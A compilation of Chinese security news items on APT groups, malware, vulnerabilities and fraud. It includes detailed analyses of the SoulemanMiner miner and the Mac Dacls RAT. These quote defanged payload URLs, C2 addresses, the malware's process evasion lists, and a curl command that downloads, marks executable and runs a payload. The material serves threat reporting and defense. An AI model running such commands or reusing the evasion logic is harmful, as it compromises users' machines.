在调查关于Cycldek组织2018年后有关攻击活动时，发现对该组织的信息了解甚少。本文旨在弥合对该组织的知识鸿沟，了解其最新活动和操作方式。以下是关于该组织的相关信息： Cycldek（也称为Goblin Panda和Conimes）在过去两年中一直很活跃，对东南亚地区国家政府进行了针对性的攻击活动。 相关活动的分析显示了两种不同的模式，表明该组织是由一个领导管理的两个运营实体组成。 我们检测发现到了用于目标网络的横向移动和信息窃取的工具，其中包括自定义工具、未报告工具以及二进制文件。 最新公布的工具之一被命名为USBCulprit，其通过USB媒体来提取受害者的数据。这表明Cycldek可能正试图到达受害者环境中的气隙网络，或依靠物理存在达到同样的目的。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1230/     消息来源：securelist， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

之前我们说到：网络犯罪分子通常会将攻击点与热点相联系。近期，我们就发现有犯罪分子使用伦敦技术事件做诱饵来进行网络攻击。 2020年2月-5月，我们观察到在基于.space和.xyz域的新注册站点上托管了四个基于恶意宏的Microsoft Word文档。由于几个文档的最终有效负载的部署策略、技术和过程（TTP）十分类似，我们认为这是同一个攻击者的行为。 据了解，.NET有效负载的最终版以往从未被检测到过，它的代码段很小，而且与QuasarRAT相重叠，但此代码段在运行时并未使用。根据最终有效负载中的唯一字符串我们为把该RAT命名为ShellReset。由于被检测到的数量有限，我们认为这可能是是一种小范围的攻击活动，而攻击者在这个攻击过程中使用的主题也和今年在伦敦发生的热点事件有关，其中还包括5G Expo 和Futurebuild。 其中的感染链涉及一些有趣的技术，如在运行时使用受信任的Windows实用程序在终端上编译有效负载以绕过安全机制，还会从攻击者的服务器下载混淆后的源代码。本文我将对分发策略和攻击的技术进行详细分析。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1228/     消息来源：zscaler， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

6月1日消息，据国外媒体报道，当地时间上周六晚上，明尼阿波利斯警察局网站自开始有遭到黑客攻击的迹象。几天前，一段据称来自黑客组织“匿名者”(Anonymous)的视频表示，将对乔治·弗洛伊德(George Floyd)在被捕期间遭白人警察 “压颈”后死亡这一事件进行报复。 上周六美国各地城市的抗议者上街游行，反对警察针对黑人的暴力行为。明尼阿波利斯警察局和明尼阿波利斯市的网站暂时无法访问。 到周日上午，这些页面有时会要求访问者提交“验证码”，以验证它们不是机器人。这种工具被用来减缓黑客对网站的攻击。 明尼阿波利斯警察局和市政府的官员没有立即回复置评请求。5月28日，黑客组织“匿名者”在Facebook页面上发布了一段针对明尼阿波利斯警方的视频，在其中指责警方有“可怕的暴力和腐败记录”。 演讲者穿着连帽衫，戴着面具，在视频结尾说，“我们不信任你们这种腐败的组织来执行正义，所以我们将向世界揭露你们的许多罪行。”我们是一个团体。请拭目以待。” 上周末，这段视频在Facebook上被浏览了近230万次。在此期间，抗议者与美国警察执法部门以及国民警卫队发生冲突，暴力事件席卷整个美国。 一些示威活动演变成了骚乱。一些城市实行宵禁，警察有时用橡皮子弹和橡胶棒对付活动人士和报道抗议活动的记者。     （稿源：网易科技，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/6mTvjKUesPS0MrpoIW5_5Q 一、概述 腾讯安全威胁情报中心发现利用永恒之蓝漏洞攻击传播的挖矿木马SoulemanMiner。该挖矿木马在2020年1月开始出现，攻击时利用永恒之蓝漏洞在内网攻击传播，攻击成功后会继续下载由XMRig编译的门罗币挖矿程序。SoulemanMiner挖矿木马运行时，会结束其他挖矿木马进程以独占资源。 对SoulemanMiner使用的下载服务器上的样本进行分析，还发现了在攻击时传播的窃密木马AZORult和盗取数字货币的木马Bitcoin-Grabber。AZORult会从浏览器、邮件和各类客户端软件中获取登录密码并上传至远程服务器，Bitcoin-Grabber或将剪切板中的比特币、以太坊币、莱特币、门罗币等多个类型的数字钱包地址进行替换，企图在用户进行交易时盗取相应的数字货币。 通过公开的钱包地址查询交易历史记录，发现SoulemanMiner挖矿木马团伙已通过挖矿和剪切板劫持数字交易获利超过27万元人民币。 二、安全建议与解决方案 腾讯安全专家建议企业用户尽快修复永恒之蓝相关安全漏洞，避免挖矿木马利用漏洞在局域网内扩散；网管可以关闭内网暂时非必要的端口（如135、139、445、3389等），减少网络攻击面；使用腾讯T-Sec终端安全管理系统及腾讯电脑管家均已支持对SoulemanMiner的查杀。企业用户还可使用腾讯安全系列产品对网络流量进行检测，及时发现内网挖矿行为。 三、样本分析 SoulemanMiner在失陷机器解压new3.exe释放 “双脉冲星”、“永恒之蓝”漏洞攻击工具，以及1×64.dll、1×86.dll、2×64.dll、2×86.dll、3×64.dll、3×86.dll共6个Payload文件。 攻击包安装完成后，启动rundll.exe开始攻击。该文件采用Pyinstaller打包生成，我们利用开源工具pyinstxtractor.py解压文件，然后利用Easy Python Decompiler对解压出的pyc文件进行反编译得到rundll.py。 rundll.py获取本机IP地址。 针对本机IP的同A、B网段（遍历C、D网段）地址进行445端口扫描，保存结果至Result.txt。 使用“双脉冲星”、“永恒之蓝”漏洞攻击工具进行攻击。 漏洞攻击成功后，针对三组不同的IP地址，植入不同的Payload文件。 1.挖矿 Payload在目标系统执行后，分别下载x.rar、y.rar、z.rar，保存至c:\programdata\lsass4.exe 并运行。下载地址如下： http[:]//178.32.53.209/x.rar http[:]//178.32.53.209/y.rar http[:]//178.32.53.209/z.rar x.rar、y.rar、z.rar是利用NSIS生成的可执行文件，通过解压可以看到 Parameters.ini里面是配置信息： Processlist.txt是检测运行环境是否存在监控进程： taskmgr.exe ProcessHacker.exe perfmon.exe procexp.exe procexp64.exe procexp32.exe resmon.exe autoruns.exe procmon.exe aida64.exe rpexplorer.exe anvir.exe AutoCloseExe.txt是需要杀死的竞品挖矿进程名单，包括WannaMiner等： C:\Windows\System32\SearchIndexer.exe C:\Windows\System32\WUDFHost.exe C:\Windows\Fonts\runhost.exe C:\Windows\debug\winlogond.exe C:\Windows\System32\dllhost.exe C:\Windows\System32\msdtc.exe C:\Windows\System32\ctfmon.exe C:\Windows\System32\TrustedHostex.exe C:\Windows\System32\SearchProtocolHost.exe C:\Windows\System32\wuauclt.exe C:\Windows\YZebx\Xs.exe C:\Windows\odeZP\dW.exe C:\Windows\dwVSF\TW.exe C:\Windows\AppDiagnostics\wininit.exe C:\Windows\AppDiagnostics\svchost.exe C:\Windows\SysWOW64\InstallShield\setup.exe C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe C:\Windows\Fonts\Mysql\svchost.exe C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe C:\Windows\svchost.exe C:\Windows\SysWOW64\svchost.exe C:\Windows\Fonts\Mysql\puls.exe C:\Windows\System32\WUDFHostex.exe C:\Program Files\Microsoft Security Client\MpCmdRun.exe C:\Windows\Fonts\d1lhots.exe C:\Windows\kkOqZ\wM.exe C:\Windows\SysWOW64\Application.exe C:\Windows\XIPNL\EM.exe C:\Windows\MicrosoftUpdateLink.exe C:\Windows\System32\dllhostex.exe 从NSIS脚本中可以看到，样本执行后会释放conhost.exe等文件到C:\Windows\System32\drivers\目录下，然后将conhost.exe安装为服务“WinsockSvc”启动。 conhost.exe会检测是否存在Processlist.txt的监控进程，杀死AutoCloseExe.txt中的竞品挖矿进程，然后从Parameters.ini配置的服务器地址下载挖矿木马http[:]//178.32.53.209/xm64.zip。 下载得到由开源挖矿程序XMRig编译而成的挖矿木马。 2.窃密 分析发现，SoulemanMiner使用的服务器185.228.83.153还传播除挖矿外的其他木马http[:]//185.228.83.153/st.exe，st.exe通过自解压释放自身到全局启动目录C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\。 st.exe是采用Delphi编写的窃密木马AZORult，运行后会窃取以下信息加密后发送至C2服务器：http[:]//soulemanivsusa.xyz/32/index.php 窃取保存在浏览器中的各类密码； 窃取数字加密货币钱包； 窃取浏览器历史记录； 盗取网站cookie； 窃取电子邮件登陆账号密码； 窃取Telegram、Steam密码； Skype密码和聊天记录； 获取中招机器屏幕截图； 执行自定义命令 3.盗取数字货币 通过服务器下载的另一样本http[:]//185.228.83.153/777.exe，自解压得到svhosts.exe，同样安装到全局启动目录下。svhosts.exe是采样C#编写的数字货币盗取程序（也称剪切板劫持木马）Bitcoin-Grabber。 Bitcoin-Grabber实时监测获取电脑剪切板内容，通过正则匹配发现其中的数字加密货币地址，并将匹配到的不同类型钱包地址替换成木马的钱包地址，以便在用户进行转账时盗取数字货币。 盗取数字货币用的钱包地址如下： 通过公开的矿池、交易历史可查到的信息，该木马的部分钱包通过盗取和挖矿已获利超过27万元人民币。 IOCs IP 116.203.240.6 178.32.53.209 185.228.83.153 Domain klicoverof.world handler1.soulemanifight.club 3.soulemanifight.club 2.soulemanifight.club 1.soulemanifight.club 1.blackhohol.online 2.blackhohol.online km1.maxvarlamoff.club km2.maxvarlamoff.club km1.koronavirusfuck.xyz km2.koronavirusfuck.xyz km2.dancingblack.online 1.novichok.xyz 2.novichok.xy 1.soulemanivsusa.xyz 2.soulemanivsusa.xyz soulemanivsusa.xyz Md5 2662452d7f77c434b185040575c87932 fdae88d3a3e21ab29f0e4390f960543c fb59c96176c1453cd2a05eadb8368026 a8f757a0a871b2aaca3535f16f0c8b66 b9ae13778f36534ddfeccf7329f4f62e 04d04cbd71f45ad36a03fd9a3a761055 1ed7e0fdd1e072cb92b8115579aac391 8c50dabe5dd305d1f6d28f5164075ff7 0f38c4b35c4f830ba14d9237bf82af56 6fa76c8b29b4da063766d2e6df001ed6 04ac52778d6871d24a5dc957a41d84fd 4cf0ff9887c3e7de5d4c0ed9674d2903 67a7c1c24de0026b9d367fc5f0048a0e 6fa76c8b29b4da063766d2e6df001ed6 8ab5c496b795f12526e7ae0bf26365fb URL http[:]//178.32.53.209/x.rar http[:]//178.32.53.209/y.rar http[:]//178.32.53.209/z.rar http[:]//185.228.83.153/new3.exe http[:]//3.soulemanifight.club/z.rar http[:]//185.228.83.153/xm32.zip http[:]//178.32.53.209/777.exe http[:]//185.228.83.153/777.exe C2 http[:]//soulemanivsusa.xyz/32/index.php

德国和法国的研究人员在预印本网站 arXiv 上发表论文（PDF），分析了过去几年发生的开源软件供应链攻击。软件供应链攻击有两类：其一是在软件产品中植入恶意代码去感染终端用户，此类攻击的一个著名例子是发生在乌克兰的 NotPetya 勒索软件攻击。 攻击者入侵了乌克兰流行会计软件的更新服务器释出了恶意更新，这次攻击造成了数十亿美元的损失，是已知最具破坏性的网络攻击之一。 另一个例子是 CCleaner 的恶意版本通过官网传播给终端用户，它在长达一个多月时间里被下载了 230 万次。另一类软件供应链攻击是向软件产品的依赖包植入恶意代码。随着开源软件开发模式的流行，此类的攻击日益常见。 研究人员分析了 npm、PyPI 和 RubyGems 软件包管理系统发现的 174 个恶意依赖包，他们发现 56% 的软件包在安装时触发恶意行为，41% 使用额外的条件去判断是否运行。61% 的恶意软件包利用了名字相似性向开源生态系统植入恶意包。攻击者的主要目的是析取数据。     （稿源：solidot，封面源自网络。）

DNS 解析程序的一个漏洞允许攻击者通过封包放大创造拒绝服务条件。该漏洞被称为 NXNSAttack。攻击者滥用了 DNS 委托机制，它发送的委托只包含权威 DNS 服务器的名字但不包含其 IP 地址。 DNS 解析程序不能向“名字”发送域名查询，因此解析器首先需要获得权威 DNS 服务器的 IPv4 或 IPv6 地址，之后才能继续查询域名。 NXNSAttack 就是基于这一原理，攻击者发送的委托包含了假的权威服务器名字，指向受害者的 DNS 服务器，迫使解析程序对受害者的 DNS 服务器生成查询。一次查询会被放大数十次乃至数百次，对受害者服务器发动了拒绝服务攻击。 众多 DNS 软件都受到影响，其中包括 ISC BIND (CVE-2020-8616)、NLnet labs Unbound (CVE-2020-12662)、PowerDNS (CVE-2020-10995)、 CZ.NIC Knot Resolver (CVE-2020-12667)、Cloudflare、Google、Amazon、Microsoft、Oracle(DYN)、Verisign、IBM Quad9 和 ICANN。细节可查阅论文。     （稿源：solidot，封面源自网络。）

据外媒AppleInsider报道，一个研究团队披露了一个新的漏洞，可以让攻击者欺骗现代蓝牙设备，使其与伪装成受信任的恶意设备配对。这个安全漏洞被团队称为蓝牙冒充攻击(BIAS)，影响了一系列使用蓝牙的设备，包括iPhone、iPad和Mac。 从本质上说，BIAS攻击利用了蓝牙设备如何处理长期连接的漏洞。当两台蓝牙设备配对后，它们在一个“链接密钥 ”上达成一致，这样它们就可以在不经过配对过程的情况下重新连接到对方。瑞士洛桑联邦理工学院的研究人员发现，他们能够在不知道这个链接密钥的情况下，欺骗之前配对过的设备的蓝牙地址来完成认证过程。 更具体地说，当攻击设备假装是一个只支持单边认证的先前受信任的设备时，该漏洞就会启动–这是蓝牙中最低的安全设置。通常情况下，用户的设备将是验证该连接是否有效的设备。然而，通过使用一种被称为“角色切换”的策略，攻击者可以欺骗认证，并与用户设备建立安全连接。 结合其他蓝牙漏洞，如蓝牙密钥协商(KNOB)，攻击者可以破坏在安全认证模式下运行的设备。一旦BIAS攻击成功，被攻击的设备就可以被用来进行其他的利用，包括访问通过蓝牙发送的数据，甚至控制之前配对的设备所拥有的功能。 由于蓝牙连接通常不需要用户进行明确的交互，因此BIAS和KNOB攻击也是隐蔽的，可以在用户不知情的情况下进行。 谁会受到BIAS攻击的威胁？ 这个缺陷只影响到蓝牙基本速率/增强数据速率，也就是经典蓝牙。但这仍然使相对较新的苹果设备受到攻击，包括iPhone 8及以上版本、2017年版 MacBook设备及以上版本、2018年的iPad机型及以上版本。 为了实施攻击，不良行为者需要在易受攻击设备的蓝牙范围内，并知道之前配对设备的蓝牙地址。对于一个熟练的攻击者来说，找到这些蓝牙地址相对来说是件小事，即使是随机的。 研究人员已经通知了蓝牙特别兴趣小组(SIG)，该小组已经更新了蓝牙核心规范来缓解这一漏洞。苹果和三星等厂商很可能会在不久的将来推出固件或软件补丁，配合修复措施。   （稿源：cnBeta，封面源自网络。）

北京时间4月29日消息，作为全球最大的主权财富基金Norfund基金因网络诈骗，被骗子轻而易举的骗走1000万美元，而骗子是利用了所谓“泄露的付款数据”这一缺陷来作案的。 报道，挪威主权基金Norfund（也被称为挪威国家基金）的资金来源于著名的北海油田收益，目前市值超过1万亿美元。该基金表示，有黑客操纵了该组织的一笔交易，将一笔原本打算借给柬埔寨一家小额信贷机构的贷款转入受骗子控制的一个账户，结果导致该基金在3月份被骗1亿克朗（约为1000万美元）。该基金表示，这笔钱似乎已经从柬埔寨转移到了墨西哥，由于损失巨大，国际警方已经介入调查此事。 Norfund周三在谈到这起网络攻击诈骗案时表示：“在这段时间里，诈骗者以一种在结构、内容和语言使用上都非常巧妙的方式，操纵和伪造了Norfund与借款机构之间的信息交换。文件和付款明细都是伪造的。”骗子用一些伪造的发票或伪造的电子邮件把钱转移到了其他的账户，说明整个交易过程对票据的把关不过关。 其实这个骗局很简单，但却非常有效。骗子会先欺骗公司里的某个关键人物，然后欺骗公司里的其他人把钱转到一个新账户里，因为这些付款在计划中是合法和得到授权的，所以受害者通常要到最后才反应过来。 首席执行官Tellef Thorleifsson承诺，将迅速与国际警方采取行动，将骗子绳之以法，并防止该组织再次被骗。他表示：“这是一起严重的事件。这一网络诈骗行为清楚地表明，我们作为一个国际投资者和发展组织， 在利用数字渠道时很容易受到攻击。发生这种情况的事实表明，我们的系统和管理还不够好。我们必须立即采取严肃的行动来纠正这种情况。” 据悉，除警方介入外，挪威主权基金还表示，它正与挪威外交部及旗下的银行DNB合作，追踪这个骗子并取回赃款。普华永道也被要求对该基金的IT安全设置进行评估。虽然成为此类网络攻击的受害者令人尴尬，但Norfund并不是唯一一家。如果这件事的核心在于互联网交易中的商务邮件欺诈，那么说明这种网络欺诈已形成一个数十亿美元的产业，情况只会变得更糟。   （稿源：凤凰网科技，封面源自网络。）

有关研究团队最新发现了一种新的Dacls远程访问特洛伊木马（RAT）变种，它与朝鲜的Lazarus集团有关联，并且专门为Mac操作系统设计。 Dacls是2019年12月奇虎360 NetLab发现的一种针对Windows和Linux平台的全功能隐蔽远程访问特洛伊木马（RAT）。 这个Mac变种至少通过一个名为MinaOTP的木马化的macOS二元身份验证应用程序进行分发，该应用程序主要由中国用户使用。与Linux变种类似，它拥有多种功能，包括命令执行、文件管理、流量代理和蠕虫扫描。 发现 4月8日，一个名为“TiNakOTP”的可疑Mac应用程序从香港提交到VirusTotal，当时没有任何引擎检测到它。 恶意的bot可执行文件位于应用程序的“Contents/Resources/Base.lproj/”目录中，当它是Mac可执行文件时，它会伪装成nib文件（“SubMenu.nib”）。它包含字符串“c_2910.cls”和“k_3872.cls”，而这是以前检测到的证书和私钥文件的名称。 持久性 该RAT通过LaunchDaemons或LaunchAgents持久存在，它们采用属性列表（plist）文件，这个文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于，LaunchAgents代表登录用户运行代码，而LaunchDaemons以root用户运行代码。“ 当恶意应用程序启动时，它将在“Library/LaunchDaemons”目录下创建一个名称为“com.aex-loop.agent.plist”的plist文件，plist文件的内容在应用程序中进行了硬编码。 该程序还会检查“getpwuid( getuid() )”是否返回当前进程的用户ID。如果返回用户ID，它将在LaunchAgents目录“Library/LaunchAgents/”下创建plist文件“com.aex-loop.agent.plist”。 图1 plist文件 存储plist的文件名和目录为十六进制格式并附加在一起，它们向后显示文件名和目录。 图2 目录和文件名生成 配置文件 配置文件包含有关受害者计算机的信息，例如Puid、Pwuid、插件和C＆C服务器，配置文件的内容使用AES加密算法进行加密。 图3 加载配置 Mac和Linux变种都使用相同的AES密钥和IV来加密和解密配置文件，两种变种中的AES模式均为CBC。 图4 AES密钥和IV 配置文件的位置和名称以十六进制格式存储在代码中，该配置文件名称伪装成与Apple Store相关的数据库文件：“Library/Caches/Com.apple.appstore.db”。 图5 配置文件名 “IntializeConfiguration”功能使用以下硬编码的C＆C服务器初始化配置文件。 图6 初始化配置文件 通过从C＆C服务器接收命令来不断更新配置文件。安装后的应用程序名称为“mina”。Mina来自MinaOTP应用程序，它是针对macOS的双因素身份验证应用程序。 图7 配置文件正在更新 主循环 初始化配置文件后，执行主循环以执行以下四个主命令： 将C＆C服务器信息从配置文件上载到服务器（0x601） 从服务器下载配置文件内容并更新配置文件（0x602） 通过调用“getbasicinfo”函数（0x700）从受害者的计算机上传收集的信息 发送heartbeat信息（0x900） 命令代码与Linux.dacls完全相同。 图8 主循环 插件 此Mac-RAT拥有Linux变种中的所有六个插件，以及一个名为“SOCKS”的附加插件。这个新插件用于代理从受害者到C＆C服务器的网络流量。 该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分，将在插件初始化时加载。 图9 加载的插件 CMD插件 cmd插件类似于Linux rat中的“bash”插件，它通过为C＆C服务器提供一个反向shell来接收和执行命令。 图10 CMD插件 文件插件 文件插件具有读取、删除、下载和搜索目录中文件的功能。Mac和Linux变种之间的唯一区别是Mac变种不具有写入文件的能力（case 0）。 图11 文件插件 进程插件 进程插件具有终止、运行、获取进程ID和收集进程信息的功能。 图12 进程插件 如果可以访问进程的“ / proc /％d / task”目录，则插件将从进程获取以下信息，其中％d是进程ID： 通过执行“/ proc /％/ cmdline”获取进程的命令行参数 “/ proc /％d / status”文件中进程的名称、Uid、Gid、PPid 测试插件 Mac和Linux变种之间的测试插件的代码是相同的，它检查到C＆C服务器指定的IP和端口的连接。 RP2P插件 RP2P插件是一个代理服务器，用于避免受害者与参与者的基础设施进行直接通信。 图13 反向P2P LogSend插件 Logsend插件包含三个模块： 检查与日志服务器的连接 扫描网络（蠕虫扫描仪模块） 执行长期运行的系统命令 图14 Logsend插件 该插件使用HTTP端口请求发送收集的日志。 图15 用户代理 这个插件中一个有趣的功能是蠕虫扫描程序。“start_worm_scan”可以扫描端口8291或8292上的网络子网，要扫描的子网是基于一组预定义规则确定的。下图显示了选择要扫描的子网的过程。 图16 蠕虫扫描 Socks插件 Socks插件是此Mac Rat中新增的第七个插件，它类似于RP2P插件，并充当引导bot和C＆C基础结构之间通信的媒介，它使用Socks4进行代理通信。 图17 Socks4 网络通讯 此Mac-RAT使用的C＆C通信与Linux变种类似，为了连接到服务器，应用程序首先建立一个TLS连接，然后执行beaconing操作，最后使用RC4算法对通过SSL发送的数据进行加密。 图18 应用程序生成的流量（.mina） 图19 TLS连接 Mac和Linux变种都使用WolfSSL库进行SSL通信，WolfSSL通过C中的TLS的开源实现，支持多个平台。这个库已被多个威胁参与者使用，例如，Tropic Trooper在其Keyboys恶意软件中使用了这个库。 图20 WolfSSL 用于beaconing的命令代码与Linux.dacls中使用的代码相同，这是为了确认bot和服务器的身份。 图21 Beaconing RC4密钥是通过使用硬编码密钥生成的。 图22 RC4初始化 变体和检测 我们还确定了此RAT的另一个变体，该变体使用以下curl命令下载恶意负载：curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wpcontent/uploads/2020/01/images.tgz.001>/ dev / null 2>＆1 && chmod + x〜/ Library / .mina> /dev / null 2>＆1 &&〜/ Library / .mina> / dev。 我们认为，Dcals RAT的Mac变体与Lazarus小组（也称为Hidden Cobra和APT 38）有关，Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪的臭名昭著的朝鲜恐怖组织。 据悉，该组织是最成熟的参与者之一，能够针对不同平台定制恶意软件。这个Mac-RAT的发现表明，APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。 IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd   loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001 67.43.239.146 185.62.58.207 50.87.144.227   消息来源：malwarebytes， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

5月7日上午消息，近期发现有黑客组织在不断尝试窃取我国医疗卫生行业的相关机密，通过安全大脑多次监测、追踪到的证据分析证明，该组织确为越南黑客组织APT32（海莲花OceanLotus)。 有关公司表示，本轮攻击使用白利用手法绕过了部分杀毒软件的查杀，利用新冠疫情题材诱使用户执行木马程序，最终达到控制系统、窃取情报的目的，这也是“海莲花”惯用的手法之一。 据介绍，海莲花是高度组织化、专业化的境外国家级黑客组织。从2012年4月起，就针对中国多个实体机构，开展了精密组织的网络攻击。据此前360发布的报告显示，“海莲花”发动的APT攻击，地域广泛涉及我国29个省，以及境外至少36个国家。其主要使用的是“鱼叉攻击”、“水坑攻击”两种方式。在APT潜伏期间，至少使用了4种不同程序形态、不同编码风格和不同攻击原理的木马程序，恶意服务器遍布全球13个国家，注册的已知域名多达35个。 （稿源：新浪科技，封面源自网络。）